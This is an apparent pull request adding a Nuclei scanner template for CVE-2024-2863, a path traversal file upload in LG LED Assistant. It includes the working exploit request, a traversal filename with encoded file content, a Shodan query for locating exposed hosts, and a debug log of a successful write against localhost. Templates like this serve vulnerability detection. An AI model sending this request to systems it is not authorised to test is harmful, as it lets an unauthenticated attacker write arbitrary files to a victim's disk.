### PR TITLE
Add CVE-2024-2863.yaml

### DIFF
--- a/http/cves/2024/CVE-2024-2863.yaml
+++ b/http/cves/2024/CVE-2024-2863.yaml
@@ -1,0 +1,49 @@
+id: CVE-2024-2863
+
+info:
+  name: LG LED Assistant - Thumbnail Path Traversal File Upload
+  author: beginee
+  severity: high
+  description: |
+    A path traversal vulnerability exists in the endpoint handler for /api/thumbnail in Common.js. 
+    An unauthenticated remote attacker can exploit this to upload arbitrary files to any location on the disk drive where the product is installed.
+  reference:
+    - https://www.tenable.com/security/research/tra-2024-08
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-2863
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2024-2863
+    cwe-id: CWE-22
+    epss-score: 0.23973
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: 'http.title:"LG LED Assistant" OR http.title:"LED Assistant"'
+  tags: cve,cve2024,lg,lg-led-assistant,path-traversal,file-upload,thumbnail,unauthenticated
+
+variables:
+  target_filename: "/../../../../../../Users/Public/poc_test.txt"
+  target_fileStr: "bWFsaWNpb3VzIGNvbnRlbnQ%3d"
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/api/thumbnail"
+    headers:
+      Content-Type: "application/x-www-form-urlencoded"
+      User-Agent: "nuclei-cve-2024-2863"
+    body: "fileName={{target_filename}}&fileStr={{target_fileStr}}"
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: regex
+        regex:
+          - '"resCode"\s*:\s*"SUCCESS"'
+    extractors:
+      - type: regex
+        name: rescode
+        regex:
+          - '"resCode"\s*:\s*"([^"]+)"'


### PR DESCRIPTION
### Template / PR Information
- Added CVE-2024-2863
- References: https://www.tenable.com/security/research/tra-2024-08

### Template Validation

I've validated this template locally?
- [v] YES
- [ ] NO

```
C:\PROJECT_DISCOVERY\nuclei>nuclei -t 2863.yaml -u https://127.0.0.1:8787 --debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.8

                projectdiscovery.io

[WRN] Found 22 template[s] loaded with deprecated paths, update before v3 for continued support.
[INF] Current nuclei version: v3.4.8 (outdated)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2024-2863] Dumped HTTP request for https://127.0.0.1:8787/api/thumbnail

POST /api/thumbnail HTTP/1.1
Host: 127.0.0.1:8787
User-Agent: nuclei-cve-2024-2863
Connection: close
Content-Length: 88
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

fileName=/../../../../../../Users/Public/poc_test.txt&fileStr=bWFsaWNpb3VzIGNvbnRlbnQ%3d
[DBG] [CVE-2024-2863] Dumped HTTP response https://127.0.0.1:8787/api/thumbnail

HTTP/1.1 200 OK
Connection: close
Content-Length: 21
Access-Control-Allow-Credentials: true
Cache-Control: no-cache, no-store, must-revalidate
Content-Security-Policy: default-src 'self';connect-src 'self' https://localhost:8787 http://localhost:8787 ws://localhost:8787 wss://localhost:8787 https://localhost:3000 http://localhost:3000 ws://localhost:3000 wss://localhost:3000 https://localhost:3001 http://localhost:3001 ws://localhost:3001 wss://localhost:3001 https://127.0.0.1:8787 http://127.0.0.1:8787 ws://127.0.0.1:8787 wss://127.0.0.1:8787 https://127.0.0.1:3000 http://127.0.0.1:3000 ws://127.0.0.1:3000 wss://127.0.0.1:3000 https://127.0.0.1:3001 http://127.0.0.1:3001 ws://127.0.0.1:3001 wss://127.0.0.1:3001 https://192.168.254.128:8787 http://192.168.254.128:8787 ws://192.168.254.128:8787 wss://192.168.254.128:8787 https://192.168.254.128:3000 http://192.168.254.128:3000 ws://192.168.254.128:3000 wss://192.168.254.128:3000 https://192.168.254.128:3001 http://192.168.254.128:3001 ws://192.168.254.128:3001 wss://192.168.254.128:3001 'unsafe-inline';script-src 'self' 'unsafe-eval' 'nonce-202539';style-src 'self' 'unsafe-inline';frame-ancestors 'self';form-action 'self';img-src 'self' data: blob:
Content-Type: application/json; charset=utf-8
Date: Tue, 30 Sep 2025 01:42:35 GMT
Etag: W/"15-uyVxm6TPbPnBE2KlwMdiB3SB/Uo"
Set-Cookie: connect.sid=s%3AHVaYvMhWUs49tV7PNUVsTi8bqqR7nzLK.P5Yv4vwHJUY84dUJDmSzSbLYJe5NNAGLOD6Ixa6%2BAuU; Path=/; HttpOnly; Secure; SameSite=Strict
Strict-Transport-Security: max-age=31536000
Vary: Origin
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN

{"resCode":"SUCCESS"}
[CVE-2024-2863:status-1] [http] [high] https://127.0.0.1:8787/api/thumbnail [""resCode":"SUCCESS""]
[CVE-2024-2863:regex-2] [http] [high] https://127.0.0.1:8787/api/thumbnail [""resCode":"SUCCESS""]
[INF] Scan completed in 756.058ms. 2 matches found.
```

### Additional References:
Vulnerability exists in LG LED Assistant v2.1.65.